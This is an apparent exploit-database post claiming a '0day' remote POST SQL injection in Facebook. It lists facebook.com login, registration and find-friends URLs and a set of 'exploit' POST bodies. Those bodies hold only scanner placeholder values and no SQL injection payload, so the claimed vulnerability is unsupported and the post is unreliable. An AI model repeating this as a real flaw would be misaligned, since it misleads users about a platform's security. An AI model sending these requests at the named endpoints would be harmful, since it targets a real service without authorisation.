===> INFO:
Author : TAURUS OMAR
Category : Webapps / 0day
Title Exploit : Facebook - Remote Post SQL Injection
Vendor : Facebook
URL Vendor : http://www.facebook.com/
0day exploits : 1337day.com Inj3ct0r Exploit DataBase

==> SAMPLE REMOTE POST SQL INJECTION
http://www.facebook.com/login.php?login_attempt=1 [ Remote Post SQL Injection ]
http://www.facebook.com/r.php?possible_fb_user=1 [ Remote Post SQL Injection ]
http://www.facebook.com/r.php?locale=es_LA&possible_fb_user=1 [ Remote Post SQL Injection ]
http://www.facebook.com/find-friends/index.php?jsonp=1 [ Remote Post SQL Injection ]
https://www.facebook.com/r.php?fbpage_id=20531316728 [ Remote Post SQL Injection ]

==> EXPLOIT'S
+trynum=1&charset_test=€,´,%E2%82%AC,%C2%B4,%E6%B0%B4,%D0%94,%D0%84&timezone=&lgnrnd=172128_Wkmc&lgnjs=n&locale=es_LA&lsd=AVo_L9kt&email=WCRTESTINPUT000000&pass=WCRTESTINPUT000001&default_persistent=0&next=http://www.facebook.com/advertising/?campaign_id=402047449186&placement=pflo&extra_1=not-admgr-user
+amp;extra_2=AdvertisingLink%3ACREATE_AN_AD&charset_test=€,´,%E2%82%AC,%C2%B4,%E6%B0%B4,%D0%94,%D0%84&timezone=&lgnrnd=171806_rfMa&lgnjs=n&email=WCRTESTINPUT000000&pass=WCRTESTINPUT000001&default_persistent=0&login=Entrar&lsd=AVo_L9kt&next=https://www.facebook.com/browse/likes/?id=267999343307103&return_session=0&legacy_return=1&display=&session_key_only=0
+login_str=wcrtestinput000000&password=wcrtestinput000001&lsd=avo_l9kt&importer_action=2&flow=2&type=1&callback_element_id=&tracked_params=[]
+charset_test=€,´,€,´,?,?,?&timezone=&lgnrnd=171816_HdJ7&lgnjs=n&email=WCRTESTINPUT000000&pass=WCRTESTINPUT000001&default_persistent=0&login=Entrar&lsd=AVo_L9kt&next=https://www.facebook.com/browse/likes/?id=267999343307103&return_session=0&legacy_return=1&display=&session_key_only=0&trynum=1
+display=&session_key_only=0&trynum=1&charset_test=€,´,€,´,?,?,?&timezone=&lgnrnd=171806_rfMa&lgnjs=n&email=WCRTESTINPUT000000&pass=WCRTESTINPUT000001&default_persistent=0&login=Entrar&lsd=AVo_L9kt&next=https://www.facebook.com/browse/likes/?id=267999343307103&return_session=0&legacy_return=1
+legacy_return=1&display=&session_key_only=0&trynum=1&charset_test=€,´,€,´,?,?,?&timezone=&lgnrnd=171816_HdJ7&lgnjs=n&email=WCRTESTINPUT000000&pass=WCRTESTINPUT000001&default_persistent=0&login=Entrar&lsd=AVo_L9kt&next=https://www.facebook.com/browse/likes/?id=267999343307103&return_session=0
+r=115+reg_instance=whvet-ygwqujbcwr0iwc_jcb&openid_token=&uo_ip=&key=&re=&mid=&fid=&reg_dropoff_id=&reg_dropoff_code=&ro_invite_signup_id=737818179100220658&terms=on&abtest_registration_group=1&referrer=&md5pass=&validate_mx_records=1&asked_to_login=0&ab_test_data=&firstname=wcrtestinput000000&lastname=wcrtestinput000001&reg_email__=wcrtestinput000002&reg_email_confirmation__=wcrtestinput000003&reg_passwd__=wcrtestinput000004&captcha_persist_data=aznwcfsbvtu_hsnl9ddzwtkd6b-l6k4sw6w5bf-7m80q4tuehmrrvmaoezd5uw_qan5757cni6lxooxdduakfouj-hhexh-gmmxfsuvdwouj5dkt_hfam-0xgtltzhe1kanr7x1m7s5wfqr75mukog2ylpcxdgo_nyz1-et-whce93nr-ddraaovwntqbpq0p-d-xkbv6-gmuklicm6bdc2zc_ffdx7nysuktmdlqgsutenuvgc3-rndgbfwuv7vlez9uvamllsjvp2hu7lmq2abyguj_prr5vv7euuhuq8ebgq1arpbs9t7mdteq17stmys_ovowrc2eno9qzkspeh4brsgx8oi6lg0yeccwspf4a&captcha_session=cmqamvx4apmppd9boq5hew&extra_challenge_params=authp=nonce.tt.time.new_audio_default&psig=qgnx8ieq-k9hb0c3ceqwfzaavyi&nonce=cmqamvx4apmppd9boq5hew&tt=ducvyhgabbkslmk3pkqnmd16nqi&time=1339980632&new_audio_default=1&recaptcha_type=password&captcha_response=wcrtestinput000005&sex=0&birthday_day=-1&birthday_month=-1&birthday_year=-1&lsd=avo_l9kt&invid=&a=&oi=&locale=es_la&app_bundle=&app_data=&reg_data=&app_id=&fbpage_id=20531316728&reg_oid=20531316728